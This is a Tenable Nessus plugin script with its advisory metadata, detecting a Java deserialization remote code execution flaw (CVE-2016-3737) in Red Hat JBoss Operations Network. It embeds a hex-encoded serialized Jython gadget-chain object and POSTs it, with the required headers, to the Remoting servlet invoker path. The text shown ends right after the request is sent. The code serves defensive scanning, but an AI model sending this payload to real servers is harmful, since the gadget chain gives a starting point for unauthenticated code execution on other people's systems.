
nessus — JBOSS_ON_DESERIALIZE_CC.NASL (This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.)
History: Jun 06, 2016 - 12:00 a.m.

Red Hat JBoss Operations Network Java Object Deserialization RCE

2016-06-06 00:00:00
This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
www.tenable.com

9 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

COMPLETE

AV:N/AC:L/Au:N/C:P/I:P/A:C

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

0.008 Low

EPSS

Percentile

81.6%

The remote Red Hat JBoss Operations Network server is affected by a remote code execution vulnerability due to unsafe deserialization of unauthenticated Java objects that are handed to the Jython library. An unauthenticated, remote attacker can exploit this, by sending specially crafted Java objects to the HTTP interface, to execute arbitrary code on the target host. Note that, per the plugin's solution text, Tenable Research reports that Red Hat's JBoss Operations Network 3.3 Update 06 did not resolve the issue; enabling agent authentication is the recommended mitigation.

#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  # Plugin registration. `description` is set when Nessus loads plugin
  # metadata; the active check further down runs in the other mode.
  script_id(91487);
  script_version("1.11");
  script_cvs_date("Date: 2019/11/19");

  # Vulnerability identifiers; TRA-2016-22 is Tenable Research's own advisory.
  script_cve_id("CVE-2016-3737");
  script_bugtraq_id(90430);
  script_xref(name:"TRA", value:"TRA-2016-22");

  script_name(english:"Red Hat JBoss Operations Network Java Object Deserialization RCE");
  script_summary(english:"Sends an unexpected Java object to the server.");

  script_set_attribute(attribute:"synopsis", value:
"The remote JBoss Operations Network server is affected by a remote
code execution vulnerability");
  script_set_attribute(attribute:"description", value:
"The remote Red Hat JBoss Operations Network server is affected by a
remote code execution vulnerability due to unsafe deserialize calls of
unauthenticated Java objects to the Jython library. An
unauthenticated, remote attacker can exploit this, by sending
specially crafted Java objects to the HTTP interface, to execute
arbitrary code on the target host.");
  script_set_attribute(attribute:"see_also", value:"https://www.tenable.com/security/research/tra-2016-22");
  script_set_attribute(attribute:"see_also", value:"https://access.redhat.com/security/cve/cve-2016-3737");
  # NOTE: the vendor fix is stated to be incomplete, so the remediation
  # guidance is a configuration hardening step (agent authentication)
  # rather than a plain "upgrade" instruction.
  script_set_attribute(attribute:"solution", value:
"Red Hat has released JBoss Operations Network 3.3 Update 06 to address
this issue; however, Tenable Research has confirmed that the update
did not resolve the issue. To mitigate this issue, users should enable
agent authentication.");
  # The CVSSv2 vector rates C/I as partial while the CVSSv3 vector rates
  # them high; both are recorded here as-is from CVE-2016-3737.
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2016-3737");

  # The check below is an actual exploitation attempt (see ACT_ATTACK),
  # not a version comparison, hence exploited_by_nessus is true.
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2016/05/02");
  script_set_attribute(attribute:"patch_publication_date", value:"2016/06/24");
  script_set_attribute(attribute:"plugin_publication_date", value:"2016/06/06");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:redhat:jboss_operations_network");
  script_end_attributes();

  # ACT_ATTACK marks this as an intrusive check that sends a crafted
  # payload to the target. NOTE(review): presumably skipped when a scan
  # policy restricts to safe checks -- confirm against the policy in use.
  script_category(ACT_ATTACK);
  script_family(english:"Misc.");

  script_copyright(english:"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");

  # Only runs once jboss_on_detect.nbin has fingerprinted the product, and
  # only against web-service ports (7080/7443 are the expected defaults).
  script_dependencies("jboss_on_detect.nbin");
  script_require_keys("installed_sw/JBoss Operations Network");
  script_require_ports("Services/www", 7080, 7443);

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("webapp_func.inc");
include("http.inc");

# Active check. Exit early unless the detection plugin recorded an install,
# then pick the HTTP port (default 7080, matching script_require_ports).
appname = 'JBoss Operations Network';
get_install_count(app_name:appname, exit_if_zero:TRUE);
port = get_http_port(default:7080);
# install["version"] is only used in the not-vulnerable audit message below;
# the vulnerability decision itself is behavioural, not version-based, which
# matters because the vendor update is stated not to fix the issue.
install = get_single_install(app_name:appname, port:port);

# This blob is (eventually) a Jython PyFunction carried in a java.util.PriorityQueue /
# java.lang.reflect.Proxy comparator gadget chain (the class names are readable in the
# hex below). On deserialization, the function's 4-byte code object (LOAD_CONST 0 /
# RETURN_VALUE, i.e. "return None") executes and does nothing else. The blob's names
# table does list open/write/close/execfile and a "./nessus_jython1.py" filename, but
# that bytecode never invokes them. Technically more could be done (only Jython
# builtins would be reachable, e.g. reading/writing files), but it is far easier and
# safer to confirm the server is vulnerable via the ClassCastException it raises on
# success -- presumably because the comparator's return value (Jython None, a
# PySingleton) cannot be cast to the type the server expects.
crafted_object = '\xac\xed\x00\x05\x73\x72\x00\x17\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x50\x72\x69\x6f\x72\x69\x74\x79\x51\x75\x65\x75\x65\x94\xda\x30\xb4\xfb\x3f\x82\xb1\x03\x00\x02\x49\x00\x04\x73\x69\x7a\x65\x4c\x00\x0a\x63\x6f\x6d\x70\x61\x72\x61\x74\x6f\x72\x74\x00\x16\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x43\x6f\x6d\x70\x61\x72\x61\x74\x6f\x72\x3b\x78\x70\x00\x00\x00\x02\x73\x7d\x00\x00\x00\x01\x00\x14\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x43\x6f\x6d\x70\x61\x72\x61\x74\x6f\x72\x78\x72\x00\x17\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x50\x72\x6f\x78\x79\xe1\x27\xda\x20\xcc\x10\x43\xcb\x02\x00\x01\x4c\x00\x01\x68\x74\x00\x25\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x72\x65\x66\x6c\x65\x63\x74\x2f\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x3b\x78\x70\x73\x72\x00\x1a\x6f\x72\x67\x2e\x70\x79\x74\x68\x6f\x6e\x2e\x63\x6f\x72\x65\x2e\x50\x79\x46\x75\x6e\x63\x74\x69\x6f\x6e\xe6\x2f\xd1\xed\x36\x06\xb6\x52\x02\x00\x08\x4c\x00\x08\x5f\x5f\x64\x69\x63\x74\x5f\x5f\x74\x00\x1a\x4c\x6f\x72\x67\x2f\x70\x79\x74\x68\x6f\x6e\x2f\x63\x6f\x72\x65\x2f\x50\x79\x4f\x62\x6a\x65\x63\x74\x3b\x4c\x00\x07\x5f\x5f\x64\x6f\x63\x5f\x5f\x71\x00\x7e\x00\x08\x4c\x00\x0a\x5f\x5f\x6d\x6f\x64\x75\x6c\x65\x5f\x5f\x71\x00\x7e\x00\x08\x4c\x00\x08\x5f\x5f\x6e\x61\x6d\x65\x5f\x5f\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x0c\x66\x75\x6e\x63\x5f\x63\x6c\x6f\x73\x75\x72\x65\x71\x00\x7e\x00\x08\x4c\x00\x09\x66\x75\x6e\x63\x5f\x63\x6f\x64\x65\x74\x00\x18\x4c\x6f\x72\x67\x2f\x70\x79\x74\x68\x6f\x6e\x2f\x63\x6f\x72\x65\x2f\x50\x79\x43\x6f\x64\x65\x3b\x5b\x00\x0d\x66\x75\x6e\x63\x5f\x64\x65\x66\x61\x75\x6c\x74\x73\x74\x00\x1b\x5b\x4c\x6f\x72\x67\x2f\x70\x79\x74\x68\x6f\x6e\x2f\x63\x6f\x72\x65\x2f\x50\x79\x4f\x62\x6a\x65\x63\x74\x3b\x4c\x00\x0c\x66\x75\x6e\x63\x5f\x67\x6c\x6f\x62\x61\x6c\x73\x71\x00\x7e\x00\x08\x78\x72\x00\x18\x6f\x72\x67\x2e\x70\x79\x74\x68\x6f\x6e\x2e\x63\x6f\x72\x65\x
2e\x50\x79\x4f\x62\x6a\x65\x63\x74\xb3\x6a\x64\xf0\x6f\x10\xd3\x67\x02\x00\x02\x4c\x00\x09\x6a\x61\x76\x61\x50\x72\x6f\x78\x79\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x4c\x00\x07\x6f\x62\x6a\x74\x79\x70\x65\x74\x00\x18\x4c\x6f\x72\x67\x2f\x70\x79\x74\x68\x6f\x6e\x2f\x63\x6f\x72\x65\x2f\x50\x79\x54\x79\x70\x65\x3b\x78\x70\x70\x73\x72\x00\x23\x6f\x72\x67\x2e\x70\x79\x74\x68\x6f\x6e\x2e\x63\x6f\x72\x65\x2e\x50\x79\x54\x79\x70\x65\x24\x54\x79\x70\x65\x52\x65\x73\x6f\x6c\x76\x65\x72\x7b\x81\x53\xc5\x9e\x62\x6a\xf9\x02\x00\x03\x4c\x00\x06\x6d\x6f\x64\x75\x6c\x65\x71\x00\x7e\x00\x09\x4c\x00\x04\x6e\x61\x6d\x65\x71\x00\x7e\x00\x09\x4c\x00\x10\x75\x6e\x64\x65\x72\x6c\x79\x69\x6e\x67\x5f\x63\x6c\x61\x73\x73\x74\x00\x11\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x78\x70\x74\x00\x0b\x5f\x5f\x62\x75\x69\x6c\x74\x69\x6e\x5f\x5f\x74\x00\x08\x66\x75\x6e\x63\x74\x69\x6f\x6e\x76\x71\x00\x7e\x00\x07\x70\x70\x70\x74\x00\x08\x3c\x6d\x6f\x64\x75\x6c\x65\x3e\x70\x73\x72\x00\x1a\x6f\x72\x67\x2e\x70\x79\x74\x68\x6f\x6e\x2e\x63\x6f\x72\x65\x2e\x50\x79\x42\x79\x74\x65\x63\x6f\x64\x65\xac\x96\xf9\x29\x14\x55\x26\x12\x02\x00\x08\x49\x00\x0c\x63\x6f\x5f\x73\x74\x61\x63\x6b\x73\x69\x7a\x65\x49\x00\x05\x63\x6f\x75\x6e\x74\x5a\x00\x05\x64\x65\x62\x75\x67\x49\x00\x08\x6d\x61\x78\x43\x6f\x75\x6e\x74\x5b\x00\x07\x63\x6f\x5f\x63\x6f\x64\x65\x74\x00\x02\x5b\x42\x5b\x00\x09\x63\x6f\x5f\x63\x6f\x6e\x73\x74\x73\x71\x00\x7e\x00\x0b\x5b\x00\x09\x63\x6f\x5f\x6c\x6e\x6f\x74\x61\x62\x71\x00\x7e\x00\x18\x5b\x00\x08\x63\x6f\x5f\x6e\x61\x6d\x65\x73\x74\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x78\x72\x00\x1a\x6f\x72\x67\x2e\x70\x79\x74\x68\x6f\x6e\x2e\x63\x6f\x72\x65\x2e\x50\x79\x42\x61\x73\x65\x43\x6f\x64\x65\x5e\x76\xd4\x44\x41\xc3\x94\x74\x02\x00\x0c\x49\x00\x0b\x63\x6f\x5f\x61\x72\x67\x63\x6f\x75\x6e\x74\x49\x00\x0e\x63\x6f\x5f\x66\x69\x72\x73\x74\x6c\x69\x6e\x65\x6e\x6f\x49\x00\x0a\x63\x6f\x5f\x6e\x
6c\x6f\x63\x61\x6c\x73\x49\x00\x0c\x6a\x79\x5f\x6e\x70\x75\x72\x65\x63\x65\x6c\x6c\x49\x00\x05\x6e\x61\x72\x67\x73\x5a\x00\x07\x76\x61\x72\x61\x72\x67\x73\x5a\x00\x09\x76\x61\x72\x6b\x77\x61\x72\x67\x73\x5b\x00\x0b\x63\x6f\x5f\x63\x65\x6c\x6c\x76\x61\x72\x73\x71\x00\x7e\x00\x19\x4c\x00\x0b\x63\x6f\x5f\x66\x69\x6c\x65\x6e\x61\x6d\x65\x71\x00\x7e\x00\x09\x4c\x00\x08\x63\x6f\x5f\x66\x6c\x61\x67\x73\x74\x00\x1f\x4c\x6f\x72\x67\x2f\x70\x79\x74\x68\x6f\x6e\x2f\x63\x6f\x72\x65\x2f\x43\x6f\x6d\x70\x69\x6c\x65\x72\x46\x6c\x61\x67\x73\x3b\x5b\x00\x0b\x63\x6f\x5f\x66\x72\x65\x65\x76\x61\x72\x73\x71\x00\x7e\x00\x19\x5b\x00\x0b\x63\x6f\x5f\x76\x61\x72\x6e\x61\x6d\x65\x73\x71\x00\x7e\x00\x19\x78\x72\x00\x16\x6f\x72\x67\x2e\x70\x79\x74\x68\x6f\x6e\x2e\x63\x6f\x72\x65\x2e\x50\x79\x43\x6f\x64\x65\x74\x54\x66\x12\x37\x82\xc5\x3b\x02\x00\x01\x4c\x00\x07\x63\x6f\x5f\x6e\x61\x6d\x65\x71\x00\x7e\x00\x09\x78\x71\x00\x7e\x00\x0c\x70\x73\x71\x00\x7e\x00\x10\x71\x00\x7e\x00\x13\x74\x00\x08\x62\x79\x74\x65\x63\x6f\x64\x65\x76\x71\x00\x7e\x00\x17\x71\x00\x7e\x00\x16\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x70\x74\x00\x06\x6e\x6f\x6e\x61\x6d\x65\x73\x72\x00\x1d\x6f\x72\x67\x2e\x70\x79\x74\x68\x6f\x6e\x2e\x63\x6f\x72\x65\x2e\x43\x6f\x6d\x70\x69\x6c\x65\x72\x46\x6c\x61\x67\x73\x6c\xb8\x3b\x06\x8e\xbb\x10\x0f\x02\x00\x05\x5a\x00\x11\x64\x6f\x6e\x74\x5f\x69\x6d\x70\x6c\x79\x5f\x64\x65\x64\x65\x6e\x74\x5a\x00\x08\x6f\x6e\x6c\x79\x5f\x61\x73\x74\x5a\x00\x0e\x73\x6f\x75\x72\x63\x65\x5f\x69\x73\x5f\x75\x74\x66\x38\x4c\x00\x08\x65\x6e\x63\x6f\x64\x69\x6e\x67\x71\x00\x7e\x00\x09\x4c\x00\x05\x66\x6c\x61\x67\x73\x74\x00\x0f\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x53\x65\x74\x3b\x78\x70\x00\x00\x00\x70\x73\x72\x00\x24\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x45\x6e\x75\x6d\x53\x65\x74\x24\x53\x65\x72\x69\x61\x6c\x69\x7a\x61\x74\x69\x6f\x6e\x50\x72\x6f\x78\x79\x05\x07\xd3\xdb\x76\x54\xca\xd1\x02\x00\x02\x4c\x00\x0b\x65\x6c\x65\x6d\x65\x6e\x74\x54\x79\x70\x
65\x71\x00\x7e\x00\x11\x5b\x00\x08\x65\x6c\x65\x6d\x65\x6e\x74\x73\x74\x00\x11\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x45\x6e\x75\x6d\x3b\x78\x70\x76\x72\x00\x18\x6f\x72\x67\x2e\x70\x79\x74\x68\x6f\x6e\x2e\x63\x6f\x72\x65\x2e\x43\x6f\x64\x65\x46\x6c\x61\x67\x00\x00\x00\x00\x00\x00\x00\x00\x12\x00\x00\x78\x72\x00\x0e\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x45\x6e\x75\x6d\x00\x00\x00\x00\x00\x00\x00\x00\x12\x00\x00\x78\x70\x75\x72\x00\x11\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x45\x6e\x75\x6d\x3b\xa8\x8d\xea\x2d\x33\xd2\x2f\x98\x02\x00\x00\x78\x70\x00\x00\x00\x02\x7e\x71\x00\x7e\x00\x28\x74\x00\x09\x43\x4f\x5f\x4e\x45\x53\x54\x45\x44\x7e\x71\x00\x7e\x00\x28\x74\x00\x14\x43\x4f\x5f\x47\x45\x4e\x45\x52\x41\x54\x4f\x52\x5f\x41\x4c\x4c\x4f\x57\x45\x44\x70\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x3b\xad\xd2\x56\xe7\xe9\x1d\x7b\x47\x02\x00\x00\x78\x70\x00\x00\x00\x02\x74\x00\x00\x71\x00\x7e\x00\x33\x00\x00\x00\x0a\x00\x00\x00\x00\x00\xff\xff\xff\xff\x75\x72\x00\x02\x5b\x42\xac\xf3\x17\xf8\x06\x08\x54\xe0\x02\x00\x00\x78\x70\x00\x00\x00\x04\x64\x00\x00\x53\x75\x72\x00\x1b\x5b\x4c\x6f\x72\x67\x2e\x70\x79\x74\x68\x6f\x6e\x2e\x63\x6f\x72\x65\x2e\x50\x79\x4f\x62\x6a\x65\x63\x74\x3b\x25\x04\x40\xd5\x1b\xd0\x04\x3f\x02\x00\x00\x78\x70\x00\x00\x00\x04\x73\x72\x00\x18\x6f\x72\x67\x2e\x70\x79\x74\x68\x6f\x6e\x2e\x63\x6f\x72\x65\x2e\x50\x79\x53\x74\x72\x69\x6e\x67\x2d\x43\xb5\xfa\x3c\xac\x49\xd1\x02\x00\x01\x4c\x00\x06\x73\x74\x72\x69\x6e\x67\x71\x00\x7e\x00\x09\x78\x72\x00\x1c\x6f\x72\x67\x2e\x70\x79\x74\x68\x6f\x6e\x2e\x63\x6f\x72\x65\x2e\x50\x79\x42\x61\x73\x65\x53\x74\x72\x69\x6e\x67\x25\x17\x51\xe8\xb3\x09\x2f\x9c\x02\x00\x00\x78\x72\x00\x1a\x6f\x72\x67\x2e\x70\x79\x74\x68\x6f\x6e\x2e\x63\x6f\x72\x65\x2e\x50\x79\x53\x65\x71\x75\x65\x6e\x63\x65\xa1\x41\x11\xa8\xfb\xc3\xae\x67\x02\x00\x01\x4c\x00\x09\x64\x65\x6c\x65\x67\x61\x74\x6f\x72\x74\x00\x27\x4c\x6f\x72\x67\x2f\x70\x79\x74\x68\x6f\x6e\x2f\x63\x6f\x72\x65\x2f\x
53\x65\x71\x75\x65\x6e\x63\x65\x49\x6e\x64\x65\x78\x44\x65\x6c\x65\x67\x61\x74\x65\x3b\x78\x71\x00\x7e\x00\x0c\x70\x73\x71\x00\x7e\x00\x10\x71\x00\x7e\x00\x13\x74\x00\x03\x73\x74\x72\x76\x71\x00\x7e\x00\x38\x73\x72\x00\x1c\x6f\x72\x67\x2e\x70\x79\x74\x68\x6f\x6e\x2e\x63\x6f\x72\x65\x2e\x50\x79\x53\x65\x71\x75\x65\x6e\x63\x65\x24\x31\xd7\x1b\xb3\xc6\xac\x1f\x60\xd7\x02\x00\x01\x4c\x00\x06\x74\x68\x69\x73\x24\x30\x74\x00\x1c\x4c\x6f\x72\x67\x2f\x70\x79\x74\x68\x6f\x6e\x2f\x63\x6f\x72\x65\x2f\x50\x79\x53\x65\x71\x75\x65\x6e\x63\x65\x3b\x78\x72\x00\x25\x6f\x72\x67\x2e\x70\x79\x74\x68\x6f\x6e\x2e\x63\x6f\x72\x65\x2e\x53\x65\x71\x75\x65\x6e\x63\x65\x49\x6e\x64\x65\x78\x44\x65\x6c\x65\x67\x61\x74\x65\x17\xcf\xdb\x2f\xe9\xe7\x04\xc2\x02\x00\x00\x78\x70\x71\x00\x7e\x00\x3c\x71\x00\x7e\x00\x33\x73\x71\x00\x7e\x00\x38\x70\x71\x00\x7e\x00\x3d\x73\x71\x00\x7e\x00\x40\x71\x00\x7e\x00\x44\x74\x00\x13\x2e\x2f\x6e\x65\x73\x73\x75\x73\x5f\x6a\x79\x74\x68\x6f\x6e\x31\x2e\x70\x79\x73\x71\x00\x7e\x00\x38\x70\x71\x00\x7e\x00\x3d\x73\x71\x00\x7e\x00\x40\x71\x00\x7e\x00\x47\x74\x00\x02\x77\x2b\x73\x71\x00\x7e\x00\x38\x70\x71\x00\x7e\x00\x3d\x73\x71\x00\x7e\x00\x40\x71\x00\x7e\x00\x4a\x74\x00\x00\x75\x71\x00\x7e\x00\x34\x00\x00\x00\x00\x75\x71\x00\x7e\x00\x31\x00\x00\x00\x04\x74\x00\x04\x6f\x70\x65\x6e\x74\x00\x05\x77\x72\x69\x74\x65\x74\x00\x05\x63\x6c\x6f\x73\x65\x74\x00\x08\x65\x78\x65\x63\x66\x69\x6c\x65\x70\x73\x72\x00\x1b\x6f\x72\x67\x2e\x70\x79\x74\x68\x6f\x6e\x2e\x63\x6f\x72\x65\x2e\x50\x79\x53\x74\x72\x69\x6e\x67\x4d\x61\x70\xb4\x24\xfa\xff\x19\x86\x24\x79\x02\x00\x01\x4c\x00\x05\x74\x61\x62\x6c\x65\x74\x00\x24\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2f\x43\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x4d\x61\x70\x3b\x78\x71\x00\x7e\x00\x0c\x70\x73\x71\x00\x7e\x00\x10\x71\x00\x7e\x00\x13\x74\x00\x09\x73\x74\x72\x69\x6e\x67\x6d\x61\x70\x76\x71\x00\x7e\x00\x53\x73\x72\x00\x26\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x63\x6f\x6e\x63\x75\x72\x72\x65\x
6e\x74\x2e\x43\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x48\x61\x73\x68\x4d\x61\x70\x64\x99\xde\x12\x9d\x87\x29\x3d\x03\x00\x03\x49\x00\x0b\x73\x65\x67\x6d\x65\x6e\x74\x4d\x61\x73\x6b\x49\x00\x0c\x73\x65\x67\x6d\x65\x6e\x74\x53\x68\x69\x66\x74\x5b\x00\x08\x73\x65\x67\x6d\x65\x6e\x74\x73\x74\x00\x31\x5b\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2f\x43\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x48\x61\x73\x68\x4d\x61\x70\x24\x53\x65\x67\x6d\x65\x6e\x74\x3b\x78\x70\x00\x00\x00\x0f\x00\x00\x00\x1c\x75\x72\x00\x31\x5b\x4c\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2e\x43\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x48\x61\x73\x68\x4d\x61\x70\x24\x53\x65\x67\x6d\x65\x6e\x74\x3b\x52\x77\x3f\x41\x32\x9b\x39\x74\x02\x00\x00\x78\x70\x00\x00\x00\x10\x73\x72\x00\x2e\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2e\x43\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x48\x61\x73\x68\x4d\x61\x70\x24\x53\x65\x67\x6d\x65\x6e\x74\x1f\x36\x4c\x90\x58\x93\x29\x3d\x02\x00\x01\x46\x00\x0a\x6c\x6f\x61\x64\x46\x61\x63\x74\x6f\x72\x78\x72\x00\x28\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2e\x6c\x6f\x63\x6b\x73\x2e\x52\x65\x65\x6e\x74\x72\x61\x6e\x74\x4c\x6f\x63\x6b\x66\x55\xa8\x2c\x2c\xc8\x6a\xeb\x02\x00\x01\x4c\x00\x04\x73\x79\x6e\x63\x74\x00\x2f\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2f\x6c\x6f\x63\x6b\x73\x2f\x52\x65\x65\x6e\x74\x72\x61\x6e\x74\x4c\x6f\x63\x6b\x24\x53\x79\x6e\x63\x3b\x78\x70\x73\x72\x00\x34\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2e\x6c\x6f\x63\x6b\x73\x2e\x52\x65\x65\x6e\x74\x72\x61\x6e\x74\x4c\x6f\x63\x6b\x24\x4e\x6f\x6e\x66\x61\x69\x72\x53\x79\x6e\x63\x65\x88\x32\xe7\x53\x7b\xbf\x0b\x02\x00\x00\x78\x72\x00\x2d\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2e\x6c\x6f\x63\x6b\x73\x2e\x52\x65\x65\x6e\x74\x72\x61\x6e\x74\x4c\x6f\x
63\x6b\x24\x53\x79\x6e\x63\xb8\x1e\xa2\x94\xaa\x44\x5a\x7c\x02\x00\x00\x78\x72\x00\x35\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2e\x6c\x6f\x63\x6b\x73\x2e\x41\x62\x73\x74\x72\x61\x63\x74\x51\x75\x65\x75\x65\x64\x53\x79\x6e\x63\x68\x72\x6f\x6e\x69\x7a\x65\x72\x66\x55\xa8\x43\x75\x3f\x52\xe3\x02\x00\x01\x49\x00\x05\x73\x74\x61\x74\x65\x78\x72\x00\x36\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x63\x6f\x6e\x63\x75\x72\x72\x65\x6e\x74\x2e\x6c\x6f\x63\x6b\x73\x2e\x41\x62\x73\x74\x72\x61\x63\x74\x4f\x77\x6e\x61\x62\x6c\x65\x53\x79\x6e\x63\x68\x72\x6f\x6e\x69\x7a\x65\x72\x33\xdf\xaf\xb9\xad\x6d\x6f\xa9\x02\x00\x00\x78\x70\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x5e\x73\x71\x00\x7e\x00\x62\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x5e\x73\x71\x00\x7e\x00\x62\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x5e\x73\x71\x00\x7e\x00\x62\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x5e\x73\x71\x00\x7e\x00\x62\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x5e\x73\x71\x00\x7e\x00\x62\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x5e\x73\x71\x00\x7e\x00\x62\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x5e\x73\x71\x00\x7e\x00\x62\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x5e\x73\x71\x00\x7e\x00\x62\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x5e\x73\x71\x00\x7e\x00\x62\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x5e\x73\x71\x00\x7e\x00\x62\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x5e\x73\x71\x00\x7e\x00\x62\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x5e\x73\x71\x00\x7e\x00\x62\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x5e\x73\x71\x00\x7e\x00\x62\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x5e\x73\x71\x00\x7e\x00\x62\x00\x00\x00\x00\x3f\x40\x00\x00\x73\x71\x00\x7e\x00\x5e\x73\x71\x00\x7e\x00\x62\x00\x00\x00\x00\x3f\x40\x00\x00\x70\x70\x78\x77\x04\x00\x00\x00\x03\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x49\x6e\x74\x65\x
67\x65\x72\x12\xe2\xa0\xa4\xf7\x81\x87\x38\x02\x00\x01\x49\x00\x05\x76\x61\x6c\x75\x65\x78\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4e\x75\x6d\x62\x65\x72\x86\xac\x95\x1d\x0b\x94\xe0\x8b\x02\x00\x00\x78\x70\x00\x00\x00\x01\x71\x00\x7e\x00\x87\x78';

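# POST the crafted object to the JBoss Remoting servlet invoker. The query
# string and the "JBoss-Remoting-Version" header are what this servlet is
# expected to accept for Java-serialized invocations (see TRA-2016-22);
# the payload is the raw serialization stream, hence application/octet-stream.
path = "/jboss-remoting-servlet-invoker/ServerInvokerServlet/?generalizeSocketException=true";
resp = http_send_recv3(
  method:"POST",
  item:path,
  data:crafted_object,
  add_headers:make_array("Content-Type", "application/octet-stream", "JBoss-Remoting-Version", "22"),
  port:port,
  exit_on_fail:TRUE);

# http_send_recv3() already exits on transport failure (exit_on_fail:TRUE);
# anything other than the [status, headers, body] triple is treated as an
# unusable response rather than silently reported as "not vulnerable".
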